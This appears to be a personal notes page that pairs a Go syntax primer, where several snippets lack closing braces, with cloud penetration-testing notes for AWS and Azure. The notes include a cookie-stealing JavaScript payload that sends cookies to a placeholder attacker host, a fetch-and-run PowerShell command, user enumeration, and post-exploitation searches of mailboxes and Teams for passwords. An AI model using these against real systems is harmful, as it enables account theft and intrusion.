Notes

Hello World

A sample go program is show here.

package main

import "fmt"

func main() {
  message := greetMe("world")
  fmt.Println(message)
}

func greetMe(name string) string {
  return "Hello, " + name + "!"
}

Run the program as below:

$ go run hello.go

Variables

Normal Declaration:

var msg string
msg = "Hello"

Shortcut:

msg := "Hello"

Constants

const Phi = 1.618

Strings

str := "Hello"

Multiline string

str := `Multiline
string`

Numbers

Typical types

num := 3          // int
num := 3.         // float64
num := 3 + 4i     // complex128
num := byte('a')  // byte (alias for uint8)

Other Types

var u uint = 7        // uint (unsigned)
var p float32 = 22.7  // 32-bit float

Arrays

// var numbers [5]int
numbers := [...]int{0, 0, 0, 0, 0}

Pointers

func main () {
  b := *getPointer()
  fmt.Println("Value is", b)

func getPointer () (myPointer *int) {
  a := 234
  return &a

a := new(int)
*a = 234

Pointers point to a memory location of a variable. Go is fully garbage-collected.

Type Conversion

i := 2
f := float64(i)
u := uint(i)

Slice

slice := []int{2, 3, 4}

slice := []byte("Hello")

Condition

if day == "sunday" || day == "saturday" {
  rest()
} else if day == "monday" && isTired() {
  groan()
} else {
  work()
}

if _, err := doThing(); err != nil {
  fmt.Println("Uh oh")

Switch

switch day {
  case "sunday":
    // cases don't "fall through" by default!
    fallthrough

  case "saturday":
    rest()

  default:
    work()
}

Loop

for count := 0; count <= 10; count++ {
  fmt.Println("My counter is at", count)
}

entry := []string{"Jack","John","Jones"}
for i, val := range entry {
  fmt.Printf("At position %d, the character %s is present\n", i, val)

n := 0
x := 42
for n != x {
  n := guess()
}

IAM

Enumerate for valid users and rols in the AWS Account

Tool URL: https://github.com/dievus/AWeSomeUserFinder
Helpful Wordlists for Users and Roles
- https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/iam__enum_users/default-word-list.txt
- https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/iam__enum_roles/default-word-list.txt

S3 Buckets

Check for Writable S3 Buckets

If you can upload, then you can show impact by changing JS to steal cookies and other things.

var xhr=new XMLHttpRequest();
xhr.open("GET", "http://<IP>:8000/?"+document.cookie, true);
xhr.send();

Check for Bucket Versioning

curl -I https://<BUCKETNAME>.s3.<REGION>.amazonaws.com //Look for x-amz-version-id
aws s3api list-object-versions --bucket <BUCKETNAME> --query "Versions[?VersionId!='null']" --no-sign-request

Brute Force Bucket Names (assuming patterns are found)

ffuf -u 'https://bucket-FUZZ.s3.amazonaws.com' -w fuzzingBucketWordlist.txt

Odds and ends that sometimes help

Check for AWS Account Number

aws sts get-access-key-info --access-key <AKIA Key>

Recon and Enumeration

Get basic information about the domain

https://login.microsoftonline.com/getuserrealm.srf?login=example.com&xml=1

AAD Internals

Get-AADIntLoginInformation -Domain <example.com>
Get-AADIntTenantID -Domain <example.com>
Invoke-AADIntReconAsOutsider -DomainName <example.com>
https://aadinternals.com/osint/

Azure Subdomain Enumeration

Github https://github.com/yuyudhn/AzSubEnum
python3 azsubenum.py -b domain -p permutations.txt -v

Username Enumeration

Github: https://github.com/0xZDH/Omnispray
python3 omnispray.py -m o365_enum_office -d example.com -uf ~/Documents/userList.txt

Checking Azure MFA (Assuming Credentials are obtained)

Github: https://github.com/dafthack/MFASweep
Invoke-MFASweep -Username <Username> -Password <password> -Recon -IncludeADFS

Blob Enumeration

Format
https://<storageAccount>.blob.core.windows.net/<containername>/file.txt

//List Directories in Blob
https://<storageAccount>.blob.core.windows.net/<containername>?restype=container&comp=list&delimiter=%2F

//Check for Versioning in blob
curl -H "x-ms-version: 2019-12-12" 'https://<storageAccount>.blob.core.windows.net/<containername>?restype=container&comp=list&include=versions' | xmllint --format - | less

//Download Potential Files (assuming versioning is enabled)
curl -H "x-ms-version: 2019-12-12" 'https://<storageAccount>.blob.core.windows.net/<containername>/file.zip?versionId=<VersionID>' --output file.zip

Post Exploitation

GraphRunner to enumerate Office Products

IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1')
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password filetype:xlsx'
Invoke-SearchTeams -Tokens $tokens -SearchTerm password
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 50

Az and Graph Powershell Modules

Setup Az and Graph Powershell Modules

Install-Module Az
Import-Module Az
Connect-AzAccount

Install-Module Microsoft.Graph
Import-Module Microsoft.Graph
Connect-MgGraph

Microsoft Graph Powershell Enumeration

#Get user Info
Get-MgUser -UserId <email> | fl
#Get AU Info
Get-MgDirectoryAdministrativeUnit | fl

#Get Roles associated with an AU
#Automation Script: https://github.com/BenTamam/PentestPlayground/blob/main/Azure/Scripts/CheckScopedRolePrivileges.ps1
$ScopedRoleMembers = Get-MgDirectoryAdministrativeUnitScopedRoleMember -AdministrativeUnitId <AU-ID>
Get-MgDirectoryRole -DirectoryRoleId <RoleID> | fl

#Find Users who are members of the Role
foreach ($member in $ScopedRoleMembers) {
    $userId = $member.RoleMemberInfo.Id
    
    if (-not $userId) {
        Write-Output "No user ID available for member with Role ID: $($member.RoleId)"
        continue
    }

    $userDetails = Get-MgUser -UserId $userId
    
    if ($userDetails) {
        Write-Output "User Details: Name - $($userDetails.DisplayName), Email - $($userDetails.Mail), Role ID - $($member.RoleId)"
    } else {
        Write-Output "Failed to retrieve details for user ID: $userId"
    }
}

#Checking Members of the AU
Get-MgDirectoryAdministrativeUnitMember -AdministrativeUnitId <AU-ID>

Windows AD Enumeration

This is a sample command in a code block

python3 helloworld.py